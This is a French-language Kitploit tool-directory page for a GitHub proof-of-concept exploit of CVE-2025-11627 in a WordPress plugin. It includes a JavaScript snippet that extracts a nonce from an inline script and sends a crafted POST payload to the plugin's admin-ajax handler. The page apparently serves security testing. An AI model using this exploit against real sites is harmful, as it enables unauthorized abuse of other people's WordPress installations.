Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2025-11627 — Exploit de preuve de concept pour CVE-2025-11627 ciblant un gestionnaire AJAX d'un plugin WordPress avec extraction de nonce et livraison de payload pour les tests de sécurité. | Kitploit
Outils/GitHubGitHub/jfriedli/cve-2025-11627
ReconnaissanceAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubjfriedli/cve-2025-11627

CVE-2025-11627

Exploit de preuve de concept pour CVE-2025-11627 ciblant un gestionnaire AJAX d'un plugin WordPress avec extraction de nonce et livraison de payload pour les tests de sécurité.

Voir le dépôt
2il y a 5 moisPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Envoyez une requête construite au gestionnaire AJAX avec le nonce extrait.

root@kitploit:~
(() => {
  // 1) trouver le script en ligne qui contient l'URL AJAX
  const s = [...document.scripts].find(sc => sc.textContent.includes('bill_minozzi_js_error_catched'));
  if (!s) { console.error('Script with ajax URL not found. Is wp_head() present?'); return; }

  // 2) extraire le nonce de "...admin-ajax.php?action=bill_minozzi_js_error_catched&_wpnonce=XXXX"
  const m = s.textContent.match(/admin-ajax\.php\?action=bill_minozzi_js_error_catched&_wpnonce=([A-Za-z0-9_-]+)/);
  if (!m) { console.error('Nonce not found in inline script'); return; }
  const NONCE = m[1];

  // 3) envoyer une charge utile minimale (preuve sûre)
  fetch('/wordpress/wp-admin/admin-ajax.php', {
    method: 'POST',
    headers: {'Content-Type':'application/x-www-form-urlencoded'},
    body:
      'action=bill_minozzi_js_error_catched' +
      '&_wpnonce=' + encodeURIComponent(NONCE) +
      '&bill_js_error_catched=' + encodeURIComponent('Message: X - URL: http://x.js - Line: 1')
  }).then(r => r.text()).then(t => console.log('Response:', t));
})();
Télécharger l’outil